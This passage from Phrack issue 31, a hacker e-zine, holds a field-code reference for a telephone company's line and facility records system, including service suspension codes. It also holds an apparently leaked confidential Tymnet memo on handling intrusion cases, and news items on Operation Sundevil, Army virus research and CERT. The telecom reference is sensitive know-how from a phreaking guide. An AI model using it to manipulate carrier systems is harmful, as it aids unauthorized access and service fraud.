XX...XX=Maximum of 61 Alphanumeric Characters
PKT Picket Fence Values
PKT XXX.X,...,XXX.X
XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or
N=No New Values
PL Private line Circuit Number
PL XX...XX
XX...XX=Maximum of 61 Alphanumeric Characters
PNL PREMIS Number List for TN
PNL XX...XX
XX...XX=Maximum of 12 Alphanumeric Characters
POP Line Equipment Print Option
POP XXX
CNC=Concentrator-1ESS, 2ESS, 3ESS, RSS
CNG=Concentrator Group-2ESS, 3ESS
HG=Horizontal Group-5XBAR
IM=Interface Module-5ESS
LFG=Line Finder Group-SXS
LLF=Line Link Frame-5XBAR
LLN=Line Link Net-1ESS
LTN=Line Trunk Net-2ESS
LU=Link Unit Module-5ESS
QC=Quarter Choice-1XBAR
SW=Switch-1XBAR
VF=Vertical FIle-5XBAR
PR Cable Pair ID
PR YXXX
Y=Alphanumeric
XXX=Numeric
PRI Frame Priority
PRI XX
XX=Two Numeric Characters
PRP Permanent Cable Pair Remarks
PRP XX...XX
XX...XX=Maximum of 14 Alphanumeric Characters
PRZ Preferred Rate Zone
PRT X
X=Numeric
PS Previously Published/Non-published Facility Indicator
PS X
N=Non-Published
!=Published
PT Package Time
PT XXX
XXX=Three Numeric Characters
PTY Party Number or Position
PTY X
X=1-4
PTY Party Indicator
PTY X
R=Reserved
O=Open
PWC PREMIS Wire Center
PWC XX...XX
XX...XX=Maximum of 8 Alphanumeric Characters
PWC Print Work Code
PWC XXX
NBT=No Back Tap
COM=Frame Complete
PBT=Print Back Tap
RCT=Place Heat Coils on "TO" Pair
RBT=Remove Back Tap
RCF=Remove Heat Coils on "FROM" Pair
VBT=Verify Back Tap
USX=Locally Defined Codes (X=1-4)
RAP Rotary Assignment Priority
RAP X
X=Numeric
RCT Recent Change Type
RCT XX
1=1ESS Office
1A=1AESS Office
2=2ESS (LO1)
2E=2ESS (EF1 and EF2)
3=3ESS
5T=5ESS
RCW Recent Change Keyword
RCW XX...XX
XX...XX=Maximum of 20 Alphanumeric Characters
RD Release Date
RD MM-DD-YY
MM=Month
DD=Day
YY=Year
RDG Message Register Reading
RDG XXXX
XXXX=Four Numeric Characters
REC Record File Name and Number
REC FFXXXXXX
FF=File Name (Alphanumeric)
XXXXXX=Record Number (Maximum of 6 Numeric Characters)
REP Reprint Option
REP X
Y=Yes
N=No
RESP Send a Solicited Response
RESP X
S=Solicited Response
REW Rework Status
REW X
Y=Yes
N=No
RLF Re-using DIPs Upper Bound Load Factor
RLF X
X=1-9
RLO Automatic Relay Assignment Present
RLO X
Y=Yes
N=No
RLY Miscellaneous Relay
RLY XX...XX
XX...XX=Maximum of 10 Alphanumeric Characters
RMK Remarks on Orders
RMK XX...XX
XX...XX=Maximum of 28 Alphanumeric Characters
RMKG Hunt Group Remarks
RMKG XX...XX
XX...XX=Maximum of 30 Alphanumeric Characters
RMKO Remarks on Office Equipment
RMKO XX...XX
XX...XX=Maximum of 12 Alphanumeric Characters
RMKP Remarks on Cable Pair
RMKP XX...XX
XX...XX=Maximum of 14 Alphanumeric Characters
RMKT Remarks on Telephone Number
RMKT XX...XX
XX...XX=Maximum of 14 Alphanumeric Characters
RNO RSS Subentity Number
RNO XX
XX=01-63
RTI Route Index
RTI XXXX
XXXX=Maximum of 4 Numeric Characters
RTYP Relay Type
RTYP XXX
TBA=Tens Block Auxiliary
SC=Sleeve Connect
AR=Advance
RTZ Rate Zone
RTZ X
X=Numeric
RW Recent Change Work
RW X
N=Recent Change Message not Required
C=Recent Change Coordination Required
RZ Resistance Zone
RZ XX
XX=Two Numeric Characters
SBS Sub-status
SBS X
A=Area Transfer
C=Cut Through
D=Dedicated
L=Cut Through and Dedicated
!=Blank
SC Sleeve Connect Relay
SC SYY-ZZZ
S=Marker Group (Numeric)
YY=Number Group Frame (Numeric)
ZZZ=Relay Number (Numeric)
SE Special Service Equipment Number
SE XX...XX
XX...XX=Maximum of 52 Alphanumeric Characters
SET Single Entity Tag
SET X
Y=CP is Served by a Single Entity on a Single Frame
!=CP Can be Served by More Than One Entity
SG Service Segment
SG X
B=Business
C=Coin
D=Data
R=Residence
S=Special
SGN Common Language Segment Number
SGN XXX
XXX=Maximum of 3 Alphanumeric Characters
SIS Special Identifying Telephone Number Supplement
SIS XXXX
XXXX=Maximum of 4 Numeric Characters
SIT Special Identifying Telephone Number
SIT XXX-YYY-XXXX
X=Numeric
Y=Numeric
SK Skip Option
SK X
X=0 or 2-9
SN Sequence Number
SN XXX
XXX=1-999
SOB Service Observing Tag
SOB XXX
XXX=YES or NO
SS Suspension Status
SS XX
DB=Deny Both Ways
DI=Deny Incoming
DO=Deny Outgoing
RS=Restore Suspended Circuit
SB=Suspend Both Ways
SD=Season Disconnect
SI=Suspend Incoming
SO=Suspend Outgoing
DX=Deny Toll Access Tervice
SSV Suspend Service Type
SSV XX
DO=Deny Outward Service
DB=Deny Both Outward and Inward Service
DX=Deny Toll Access Service
RS=Restore Denied Service
STAT Order Status
STAT XX
AC=Pending With no Framd or Installation Completion
FC=Pending With Frame Completion but no Installation Completion
IC=Pending with Installation Complation but no Frame Completion
CC=Completed Orders
CA=Canceled Orders
STAT Facility Status
STAT XX
AS=All Spare
EX=Excluded
PC=Pending Connect
RS=Reserved
SF=Spare Facility
UK=Unknown
WK=Working
STAT Load Group Status
STAT XX
EX=Blocked from all Assignments
FU=Open for Dial Transfer Assignments Only
PS=Pseudo LEN Assignments Only
SO=Open for Service Orders and Work Orders Only
WK=Open for All Assignments
STO Line Equipment Status
STO XX
AW=All Working
MS=Miscellaneous
OF=Official
TJ=Trunk and Junctor
TS=Test
WK=Working
PD=Pending Disconnect
PK Pending Disconnect/Pending New Connect
AS=All Spare
EX=Excluded
LI=Left-in Disconnect
RS=Reserved
SF=Spare
UK=Unknown
PC=Pending Connect
STP Cable and Pair Status
STP XX
AL=All Pairs
AD=All Defective
AP=All Provisioned
AW=All Working
DC=Designed Circuit
DI=Defective (I=1-9)
DM=Designed + SSM
DP=Designed + SSP
SM=Special Safeguard Measures
SP=Special Safeguard Protection
SS=Special Status
WK=Working
AS=All Spare
EX=Excluded
LI=Left-in Disconnect
RS=Reserved
SF=Spare
UK=Unknown
PC=Pending Connect
PD=Pending Disconnect
STT Telephone Number Status
STT XX
AU=Auxiliary
AW=All Working
MS=Miscellaneous
NP=Non-published
OF=Official
TJ=Trunk and Junctor
TS=Test
WK=Working
AS=All Spare
AV=Available
CM=Changed-Machine Intercept
CO=Changed-Operator Intercept
DM=Disconnected-Machine Intercept
DO=Disconnected-Operator Intercept
EX=Excluded
RS=Reserved
SF=Spare
UK=Unknown
PC=Pending Connect
PD=Pending Disconnect
PK=Pending Disconnect/Pending New Connect
SUBL Sublet Service
SUBL XXX-XXXX
XXX-XXXX=Telephone Number
SWC Set Work Code
SWC XXX
(See Print Work Code)
SWG Switch Group
SWG X
X=0-2
SYS Machine Number
SYS XX...XX
XX...XX=Maximum of 12 Alphanumeric Characters
TA Transfer Assembly
TA X
Y=Yes
N=No
TAP Touchtone Assignment Priority Number
TAP X
X=Numeric
TBA TBA Relay
TBA XYY-ZZZ
X=Marker Group Number (Numeric)
YY=Number Group Frame (Numeric)
ZZZ=Relay Number (Numeric)
TBS TBS Relay
TBS XZ-NN
X=Marker Group Number (0-9)
Z=Relay Number (0-3)
NN=Ringing Combination (01-16)
TC TO Cable
TX XX...XX
XX...XX=Maximum of 10 Alphanumeric Characters
TER Terminal
TER XXXX
XXXX=Maximum of 4 Numeric Characters
TER Terminal Number
TER Y-XXXX-ZZZZ
Y=Control Group (Alphanumeric)
XXXX=Group Number (Numeric)
ZZZZ=Terminal Number (Numeric)
THG Thousands Group
THG X or
THG XXXX
X=0-9
XXXX=0000,1000,...,9000
TK Trunk Cable and Pair Number
TK YYYYYY-XXXX
YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters)
XXXX=Cable Pair ID (Maximum of 4 Numeric Characters)
TLI Telephone Line Identifier
TLI XXX-YYY-XXXX
X=Numeric
Y=Alphanumeric
TN Telephone Number
TN XXX-XXXX
XXX-XXXX=Telephone Number
TOM Two or More Non-pending, Non-party Filtered Circuit Facilities
TOM XX
CP=Cable Pair
TN=Telephone Number
OE=Office Equipment
TP Tie Pair
TP YY...YY-XXXX
YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters)
XXXX=Tie Pair ID (Maximum of 4 Numeric Characters)
TPR Taper Code
TPR XXXXXX
XXXXXX=Maximum of 6 Alphanumeric Characters
TRE Transmission Equipment
TRE XX...XX
XX...XX=Maximum of 17 Alphanumeric Characters
TT Telephone Number Type
TT X
B=POTs Hunting
C=Coin
G=Complex Service (Direct Inward Dialing, Radio Common Carrier, etc)
O=Official
Q=Centrex
X=POTx Non-hunting
TTA Terminating Traffic Area
TTA XXX
XXX=Maximum of 3 Alphanumeric Characters
TYP Switching Type
TYP XXX
1ES=Number 1ESS
2ES=Number 2ESS
3ES=Number 3ESS
5ES=Number 5ESS
RSS=Remote Switching System
1XB=Number 1 Cross-bar
5XB=Number 5 Cross-bar
SXS=Step-by-step
DMX=DMS-10
DMC=DMS-100
US USOC
US XXXXX
XXXXX=Maximum of 5 Alphanumeric Characters
USE Entity Usage
USE X
G=Growth
S=Stable
VAL Minimum Valid Hours for Entity Data
VAL XX
XX=1-99
WC Wire Center
WC XX
XX=Alphanumeric
WL Work Location
WL Y
Y=1-8 or
WL XXX
ADM=Administrative
ACT=Assignment Change Ticket
CPC=Special Service Circuits
MCT=Maintenance Change Tickets
WPN Work Package Number
WPN XXXX
XXXX=1-9999
WPT Work Package Type
WPT XXX
XXX=Maximum of 3 Alphanumeric Characters
XN "X" Number
XN XXX-YYXX or
XN XXX-YXX
X=Numeric
Y=Alphanumeric
ZN Zone Location
ZN XXX
XXX=001-999
=============================================================================
ACKNOWLEDGEMENTS
Skinny Puppy for refreshing my memory
The Urvile for the "$*" file and further usage of echo
Bell Laboratories OPA-1Y600-01
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #7 of 10
COMPANY CONFIDENTIAL
INTERIM MEMORANDUM
SUBJECT: TYMNET SUPPORT FOR CUSTOMER'S DATA SECURITY
PURPOSE: This document provides background, and general procedures
and practices used to support customers with suspected security
problems. Field Sales is the intended audience but is a general
document and may be useful to other customer support personnel.
Currently, this document is in a final review. Meanwhile, it is to
retain the status of an internal proprietary document.
BACKGROUND: BT Tymnet Inc, and its Network Systems Company,
believe information integrity is vital to ourselves and our
customers. One way TYMNET insures integrity is by providing good
security. TYMNET has a baseline security of user name, password,
and user access profile available for all customers. Further, there
are two security products. One permits the customer to limit
password life (password automatically expires after a customer
elected time period) and the other permits the end user to change
his/her own password. Since we do consider security a key issue,
we continue to develop other security features. Also, we work with
Security vendors to certify their security products on our network,
thus permitting customers to add such products, should they so
desire.
We have established Network Systems Company Policies which provide
a framework for the information contained herein (see NSC Policy
121 and 122. More policies are in distribution as of this
writing). It is highly recommended that these policies be reviewed
since they represent the framework of this document.
Legal considerations are another key issue in any security case.
Support, other then providing the customer with related security
data, can only occur if law(s) have been broken. The
legal issues are complex and only a minimal information is
provided herein. At at the heart of this issue is the fact that
the customer is the injured party, not TYMNET. Patience and good
communication may be required to get the customer to understand
this fact. The customers must act for themselves to obtain
law enforcement support. TYMNET will support that activity, and
help to the degree possible, much as a "friend of the court".
THE SUPPORT: We provide security support as a responsible
network service provider. The first step in that support is for
the field sales representative to act as a security consultant to
the customer, at least to the extent explained below.
The customer is well advised to plan in advance "what to do
when Captain Midnight strikes" -- contingency planning, pure
simple. First there are two basic alternatives to choose from:
PROTECT AND PROCEED
OR
PURSUE AND PROSECUTE
"Protect and proceed" means 1) determine how the incident
occurred, 2) plug the security leak/hole, and 3) go on with
business as normal.
(Do we want written notification of the Intent to "Pusue and
Prosecute" from the "Injured Party?").
"Pursue and prosecute" is just that. The first step is having
the customer obtain legal support, and both we and the customer
continue to gather evidence until the suspect is apprehended. The
next step is the prosecution in a court of law. (The final step is
to return to the first alternative, e.g., now protect and
proceed.)
The customer needs to judge each case on its own merits, but
generally the first choice is the wiser one. The second choice
involves considerable effort, mostly by the customer and law
enforcement agency(s), possible negative publicity for the
customer and does not necessarily result in successful prosecution.
Good contingency planning also includes becoming familiar with the
laws and the local law enforcement people.
The starting point is a suspected incident. Herein, we will address
the case where the customer has identified a suspected intruder.
Generally, that occurs by a customer's detailed review of billing
or host based security exception reports.
At this point it is essential the field sales representative open a
ticket containing at least the following: 1) customer name and CID,
2) host(s) involved, 3) incident start and stop times, and 4) the
customer's objective. Add any other information deemed helpful.
Other support may be an on-line trace of the call, if the
suspect is currently on-line. Field support should do this trace, or
alternately, this same help can be obtained by calling network
customer support and/or NetCon. In any case it must be done while
the suspect is on-line. Such trace information should be
included on the ticket.
Based on the customer's position; the case will fit either
"prevent and proceed" or, "pursue and prosecute". The former is
straight forward, in that TYMNET security will research the
incidents(s), and provide data (generally user name and point of
origin(s) to the customer via Field Sales, with recommendations
on how to prevent any further occurrence. We do provide this
service as a responsible vendor, although strict interpretation
of NSC policy 121 precludes it. However, we do apply the policy if
a customer continues to ask for data without taking preventative
action.
The "pursue and prosecute" case is complex, and is different for each
situation. It will be explained by using a typical scenario. After
the first step (as above), it is necessary to gather data sufficient
to show a pattern of intrusion from a single TYMNET access point.
With this information, the customer (the injured party) must contacts
law enforcement agency(s), with the one exception noted below.
If that intrusion point is through a gateway from a foreign
country, for all practical purposes, the customer can do little to
prosecute. The law(s) of the foreign country will apply since
extradition is most unlikely. Therefore, action will have to be
have to be initiated by the network service provider in the
foreign country. In this case, TYMNET security will have MIS
research the session details to obtain the Network User
Identifier, and External Network Support (Jeff Oliveto's
organization) will communicate that information to the foreign
network for their action (cases involving U.S. government computers
may get special treatment - see for example - Communications of the
ACM, May, 1988, article on "Stalking the Wiley Hacker").
Most all security incidents on our network are caused by international
hackers using X.121 addressing. Frequently, our customer is unaware
of the risk of X.121 addressing, and permits it. BE SURE YOUR
CUSTOMERS KNOW THAT THEY CAN CHOOSE FULL TYMNET SECURITY FEATURES,
THEREBY PRECLUDING SUCH INTRUSIONS FROM X.121 ADDRESSING FROM
FOREIGN NETWORKS.
For the domestic case, the customer gets law enforcement (attorney
general at incoming call location, secret service if credit card
fraud is involved, or possibly the FBI, depending on the incident)
to open a case. Note, damage in estimated dollars is usually
necessary to open a case, and many agencies will not take action on
small claims. For example, as of December, 1988, the Los Angeles
Attorney will not open a case for less than $10,000 (they have too
big a caseload at higher damages).
Assuming legal support is provided, a court order for a wire tap
and trace will be obtained, thereby determining the caller's phone
number (this step can be very involved and time consuming for long
distance calls). The next legal action occurs after the calling
number is identified. A search warrant is obtained for searching the
facility housing the phone location. Normally, this search will
gather evidence sufficient for prosecution. Evidence is typically
the necessary terminal equipment, printouts, diskettes, etc. Then,
at long last the prosecution. Also note, again at the time the
calling number is identified, the injured party should use the
"protect and proceed" plan.
For further information, contact Data Security, TYMNET Validations,
or Ontyme NSC.SECURITY.
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #8 or 10
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN Phrack World News PWN
PWN Issue XXXI, Part One PWN
PWN Compiled by Phreak_Accident PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Operation "Sun-Devil"
=====================
May 9th and 10th brought on two day thats would be marked in every hackers
history book. The reason we assume these days will be important to many, is
that maybe it's time we opened are eyes and saw the witch hunt currently in
progress.
In less than 48 hours, 150 Secret Service men and other law officials
served 30 search warrents in 14 cities around the nation (This thing was hudge).
Operation "Sun-Devil" (As the Attorney General in Phoenix called it), was
a success on their part. "The investigation though is not over, and there are
more warrents to be executed.", said Jim Folwer of L.A's Secret Service.
Any details of the investigation are not being given out at this time.
The Asst. Attorney General of Pheonix told Phrack Inc. that there were other
problems involving the investigation and that it was an ongoing investigation
for the last TWO years.
It is my understanding that Gail Thackeray and the Secret Service are not,
taking this lightly. She told Phrack inc. that they are not distinquishing
pirates, hackers, or phreakers. Basically, it's any kid with a modem that calls
a BBS with an alias. Yes, we are the witches, and we are being
hunted.
The following are Two news releases obtianed via fax through the U.S.
Secret Service for Phrack Inc.
N E W S R E L E A S E
FOR IMMEDIATE RELEASE CONTACT: Gail Thackeray
------------------------ Assitant Attorney General
May 9, 1990 @ 11:00 A.M. (602) 542-4266
Attorney General Bob Corbin announced today that in
connection with an eighteen-month joint investigation into
computer crime conducted with the United States Secret
Service and the United States Attorney's office, the Arizona
Attorney General's office has executed seven search warrants
in which computers, electronic bulletin boards, telephone
test equipment and records have been seized.
The Organized Crime and Racketeering Division
investigation involved complaints by Arizona and out of state
victims of substantial financial losses resulting from credit
card fraud and theft of long distance telephone and data
communications services, and by victims of attacks on
computer systems operated by government agencies, private
corporations, telephone companies, financial institutions,
credit bureaus, and a hospital.
The Arizona Attorney General's office received
information and technical assistance from the Glendale,
Arizona Police Department's Computer Crime Unit, and from
many private sector sources, including Bellcore (Bell
Communications Research), American Express, Communications
carriers U.S. Sprint, AT&T, MCI, Com Systems, MidAmerican
Communications, LDL Communications, and Shared Use Network.
Without the cooperation of these companies and of numerous
federal, state and local law enforcement agencies around the
country, this investigation would have been impossible.
The privacy of our citizens and the health of our
economy depend upon secure, reliable computer systems.
Computer fraud and attempts to compromise senstitive public
and private computer systems will not be tolerated.
Individuals who commit these offenses in Arizona can expect
to be prosecuted.
.end.
P R E S S R E L E A S E
FOR IMMEDIATE RELEASE Contact: Wendy Harnagel
Wednesday, May 9, 1990 United States Attorney's Office
---------------------- (602) 379-3011
PHOENIX -- Stephen M. McNamee, United States Attorney
District of Arizona, Robert K. Corbin, Attorney General for
the State of Arizona, and Henry R. Potosky, Acting Special
Agent in Charge of the United States Secret Service Office in
Phoenix, today announced that approximately twenty-seven
search warrants were executed on Monday and Tuesday, May 7
and 8, 1990, in various cities across the nation by 150
Secret Service agents along with state and local law
enforcement officials. The warrants were issued as a part of
Operation Sundevil, which was a two year investigation into
alleged illegal computer hacking activities.
The United States Secret Service, in cooperation with
the United States Attorney's Office, and the Attorney General
for the State of Arizona, established an operation utilizing
sophisticated investigative techniques, targeting computer
hackers who were alleged to have trafficked in and abuse
stolen credit card numbers, unauthorized long distance
dialing codes, and who conduct unauthorized access and damage
to computers. While the total amount of losses cannot be
calculated at this time, it is estimated that the losses may
run into the millions of dollars. For example, the
unauthorized accessing of long distance telephone credit
cards have resulted in uncollectible charges. The same is
true of the use of stolen credit card numbers. Individuals
are able to utilize the charge accounts to purchase items for
which no payment is made.
Federal search warrants were executed in the following
cities:
Chicago, IL
Cincinatti, OH
Detroit, MI
Los Angeles, CA
Miami, FL
Newark, NJ
New York, NY
Phoenix, AZ
Pittsburgh, PA
Plano, TX
Richmond, VA
San Diego, CA
San Jose, CA
Unlawful computer hacking imperils the health and
welfare of individuals, corporations and government agencies
in the United States who rely on computers and telephones to
communicate.
Technical and expert assistance was provided to the
United States Secret Service by telecommunication companies
including Pac Bel, AT&T, Bellcore, Bell South, MCI, U.S.
Sprint, Mid-American, Southwestern Bell, NYNEX, U.S. West,
and by the many corporate victims. All are to be commended
for their efforts for their efforts in researching intrusions
and documenting losses.
McNamee and Corbin expressed concern that the improper
and alleged illegal use of computers may become the White
Collar crime of the 1990's. McNamee and Corbin reiterated
that the state and federal government will vigorously pursue
criminal violations of statutes under their jurisdiction.
Three individuals were arrested yesterday in other
jurisdictions on collateral or independent state charges.
The investigations surrounding the activities of Operation
Sundevil are continuing.
The investigations are being conducted by agents of the
United States Secret Service and Assistant United States
Attoryney Tim Holtzen, District of Arizona, and Assistant
Arizona Attorney General Gail Thackery.
.end.
_______________________________________________________________________________
Virus mania
===========
Robert T. Morris started it all. Who cares, it's over and done with.
Never the less, it's being dragged out in every national paper. It's old news
so we won't cover it here, but we will tell you about something the Army has up
its sleeve.
Army is Looking for a Few Good Viruses
By Rory J. O'conner
Knight-Ridder Newspapers
______________________________________
The U.S. Army is looking for help to develop the seeds of a new-age germ
warfare: It wants business to help it turn computer "viruses" into military
weapons.
Experts predict the viruses, if sucessfully developed, could be used to
wreak havoc on the increasing number of computers in the battlefield. The
destructive computer programs which have increasingly damaged commercial and
research computer systems in the past four years, could be used to disrupt
military communications and feed misleading data to enemy commanders.
The viruses could aslo be used to alter the programming of crucial
communications satellites serving combat units, the experts said.
The Army is soliciting bids from small businesses to determine the
feasibility of using computer viruses in warefare. And it is willing to pay up
to $550,000 to a company that comes up with a plan for creating the programs -
and figures out how to use military radio systems to introduce them into enemy
computers.
A computer virus is a kind of program designed to disrupt normal operation
of a computer system or damage data ont hat system by altering or destroying
it. The rogue programs are most effective when introduced secretly into the
computer system of an unsuspecting user and when their damage is subtle or
hidden fromt he user for some time.
Viruses are also self-duplicating and can spread undetected from an
infected computer to other computer systems they contact.
So far, more than 60 computer viruses have been identified, most of them
attacking poorly guarded personal computers used by businesses, universities
and inividuals. The Army's virus would have to be more sophisticated than
those programs.
But some detractors of the concept say the Army could wind up with the
same problem it has with biological weapons: Creating destructive elements
that might get loose and cause widespread damage to its own forces as well as
civilians.
"This stuff is very dangerous, and most people involved in creating
viruses are not aware of the threat," said a Bay Area virus expert who asked ot
to be named. "You can't spread anthrax around the world and not have it come
back around to you. And the enemy is using the same kind of computers and
software that we are."
Many experts who are fighting the explosion in virus activity by amateur
programmers are especially angry at government efforts to develop the programs
for the military. Some say it is particulary troubling in light of the
sentencing of Robert T. Morris Jr. (Ed -Ick), convicted in federal court of
sending a similar program through a government sponsored network in 1988.
"It bothers me that the government says in one breath (viruses) are bad
and illegal and then asks for someone to develop them," said Glenn Tenney, a
San Mateco, Calif., programmer and organizer of the annual Computer Hackers
Conference. "If Morris had done the same thing for the Army, they'd have paid
him hundreds of thousands to do it. But he did it on the wrong side and got
punished."
Computer experts say creating a virus to the Army's specifications is
possible with current technology - although some of the Army's requirements
could make developing it more difficult than creating an ordinary personal
computer virus.
First, military computer systems are usually designed with far more
security features than commercial systems, making it much harder for a virus to
enter the systems. Second, the Army is emphasizings the use of radio
communication to inject the virus into enemy systems. Normally, computer
viruses spread through the exchange of floppy disks that contain the rogue
program or along wires connecting several computers. Using complex military
radio signals instead would require expertise that mose programmers don't have.
.end
_______________________________________________________________________________
RIPCO May 8th, 1990
----- -------------
Operation Sun-Devil claimed more than just a few "Codelords" around the
states, it claimed one of the oldest and more popular boards. Nobody knows
when or if RIPCO shall return.
Reportedly, Dr. Ripco was charge on a hand-gun violation after his house
was searched. Phrack inc. can't comment on this.
The following is the exact transcript of the message left on RIPCO's
answering maching after Operation Sun-Devil.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
This is 528-5020.
As you are probably aware, on May 8, the Secret Service conducted a series
of raids across the country. Early news reports indicate these raids
involved people and computers that could be connected with credit card and
long distance toll fraud. Although no arrests or charges were made, Ripco
BBS was confiscated on that morning. It's involvement at this time is
unknown. Since it is unlikely that the system will ever return, I'd just l
say goodbye, and thanks for your support for the last six and a half years.
It's been interesting, to say the least.
Talk to ya later.
{Dr. Ricpo}
*** END OF VOICE MESSAGE ***
_______________________________________________________________________________
--------------------------------------------------------------------------------
==Phrack Inc.==
Volume Three, Issue Thirty-one, Phile #9 of 10
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN Phrack World News PWN
PWN Issue XXXI, Part Two PWN
PWN Compiled by Phreak_Accident PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
{C}omputer {E}mergency {R}esponse {T}eam
----------------------------------------
Some call it "Internet Police" -- Others call it "just stupid."
CERT however is a mix. But I do give them credit -- After all, have your
number one goal being 'making the Internet more secure' has to be a tough task.
Therefore, we give them credit.
However, CERT is funded by DARPA, which is a government agency. And
anything in my book that the government runs is bad news. Yes, the government
pays the 6 man salary and keep their hot-line active 24 hours a day.
Ahh.. What do you know about CERT? "Nothing" you say? Well, the
following is the press release and other reprints of information about CERT.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Richard Pethia <rdp@SEI.CMU.EDU>
DEAR XXXXXXXXX,
I have been reviewing our correspondence files and have discovered
that your request for information may not have been filled. I
apologize for the delay and hope that the information is still useful
to you. If, after reading the following, you have additional
questions or would like to subscribe to one of our information lists,
please send email with your question/request.
The Computer Emergency Response Team (CERT) was established by the Defense
Advanced Research Projects Agency in November of 1988 to serve members
of the Internet Research community. The press release below describes
the general role of the CERT.
More specifically, the CERT supports individual Internet sites by:
-Working with site personnel to help resolve individual computer security
incidents. Contact potentially affected sites to warn them of
possible security breaches. Work with sites to change the
conditions that allowed incidents to occur.
-Issuing advisories that alert the community to specific system
vulnerabilities or intrusion techniques, as well as the methods to
protect against them.
-Working with the community and system (primarily Unix) vendors to
reslove specific system vulnerabilities.
-Maintaining and operating moderated mailing lists that: (1) provide a
discussion forum for tools and techniques to improve the security of
Unix systems, and (2) provide a discussion forum and alert mechanism
for PC viruses, trojan horses, etc.
Over the past year we have developed hundreds of working relationships
with members of the Internet and other communities and have
established an extensive information collection and dissemination
network. Because of this network of cooperating individuals and
organizations, we are often able to advise the community of problems
allowing them to take corrective action before being affeceted by
those problems.
---------------------
No. 597-88
(202) 695-0192 (Info.)
(202) 697-3189 (Copies)
IMMEDIATE RELEASE December 6, 1988 (202) 697-5737
(Public/Industry)
DARPA ESTABLISHES COMPUTER EMERGENCY RESPONSE TEAM
The Defense Advanced Research Projects Agency (DARPA) announced today
that it has established a Computer Emergency Response Team (CERT) to
address computer security concerns of research users of the Internet,
which includes ARPANET. The Coordination Center for the CERT is
located at the Software Engineering Institute (SEI), Carnegie Mellon
University, Pittsburgh, PA.
In providing direct service to the Internet community, the CERT will
focus on the special needs of the research community and serve as a
prototype for similar operations in other computer communities. The
National Computer Security Center and the National Institute of
Standards and Technology will have a leading role in coordinating the
creation of these emergency response activities.
The CERT is intended to respond to computer security threats such as
the recent self-replicating computer program ("computer virus") that
invaded many defense and research computers.
The CERT will assist the research network communities in responding to
emergency situations. It will have the capability to rapidly
establish communications with experts working to solve the problems,
with the affected computer users and with government authorities as
appropriate. Specific responses will be taken in accordance with
DARPA policies.
It will also serve as a focal point for the research community for
identification and repair of security vulnerabilities, informal
assessment of existing systems in the research community, improvement
to emergency response capability, and user security awareness. An
important element of this function is the development of a network of
key points of contact, including technical experts, site managers,
government action officers, industry contacts, executive level
decision-makers and investigative agencies, where appropriate.
Because of the many network, computer, and systems architectures and
their associated vulnerabilities, no single organization can be
expected to maintain an in-house expertise to respond on its own to
computer security threats, particularly those that arise in the
research community. As with biological viruses, the solutions must
come from an organized community response of experts. The role of the
CERT Coordination Center at the SEI is to provide the supporting
mechanisms and to coordinate the activities of experts in DARPA and
associated communities.
The SEI has close ties to the Department of Defense, to defense and
commercial industry, and to the research community. These ties place
the SEI in a unique position to provide coordination support to the
software experts in research laboratories and in industry who will be
responding in emergencies and to the communities of potentially
affected users.
The SEI is a federally-funded research and development center,
operating under DARPA sponsorship with the Air Force Systems Command
(Electronic Systems Division) serving as executive agent. Its goal is
to accelerate the transition of software technology to defense
systems. Computer security is primarily a software problem, and the
presence of CERT at the SEI will enhance the technology transfer
mission of the SEI in security-related areas.
-END-
QUESTIONS AND ANSWERS: DARPA ESTABLISHES CERT, 12/6/88
Q: Can you provide background on earlier break-ins?
A: On November 2, 1988, thousands of computers connected to
unclassified DoD computer networks were attacked by a virus. Although
the virus did not damage or compromise data, it did have the effect of
denying service to thousands of computer users. The computer science
research community associated with the Defense Advanced Research
Projects Agency (DARPA), along with many other research laboratories
and military sites that use these networks, quickly responded to this
threat. They developed mechanisms to eliminate the infection, to
block the spread of the self-replicating program, and to immunize
against further attack by similar viruses. Software experts from the
University of California at Berkeley, with important contributions
from the Massachusetts Institute of Technology and other network
sites, rapidly analyzed the virus and developed immunization
techniques. These same software experts also provided important
assistance in the more recent Internet intrusion of 27-28 November.
As the events unfolded, DARPA established an ad hoc operation center
to help coordinate the activities of software experts working around
the clock and to provide information to appropriate government
officials. The operations center had three main tasks. It
facilitated communications among the many groups affected, it ensured
that government organizations were promptly informed of developments,
and it provided initial technical analysis in DoD. Although the
threat was contained quickly, a more maliciously designed virus could
have done serious damage.
The recent events serve as a warning that our necessarily increasing
reliance on computers and networks, while providing important new
capabilities, also creates new kinds of vulnerabilities. The
Department of Defense considers this an important national issue that
is of major concern in both the defense and commercial sectors. The
DoD is developing a technology and policy response that will help
reduce risk and provide an emergency reaction response.
Q: Who will be on the CERT?
A: The CERT will be a team of over 100 experts located throughout the
U.S. whose expertise and knowledge will be called upon when needed.
When not being called upon, they will continue their normal daily
work. As noted in the release, these experts will include: technical
experts, site managers, government action officers, industry contacts,
executive-level decision-makers and representatives from investigative
agencies.
recommendations that will be acted upon by DoD authorities.
Q: Is the CERT fully operational now?
A: We are in the very early stages of gathering people for the CERT.
We are first concentrating on collecting technical experts. A staff
is in place at SEI, but details are still being worked out.
Q: Will there just be one CERT?
A: The intent is that each major computer community may decide to
establish its own CERT. Each CERT will therefore serve only a
particular community and have a particular technical expertise. (The
DARPA/SEI CERT will serve, for example, the research community and
have expertise in Berkeley-derived UNIX systems and other systems as
appropriate.) The National Computer Security Center and the National
Institute of Standards and Technology will support the establishment
of the CERTs and coordinate among them.
Q: What are the special needs of the research community that their
CERT will serve?
A: The special challenge of the research community is improving the
level of computer security without inhibiting the innovation of
computer technology. In addition, as is often DARPA's role, their
CERT will serve as a prototype to explore the CERT concept so that
other groups can learn and establish their own.
Q: Does the CERT Coordination Center have a press point of contact?
A: No. Their function is to serve as a nerve center for the user
community.
.end
_______________________________________________________________________________
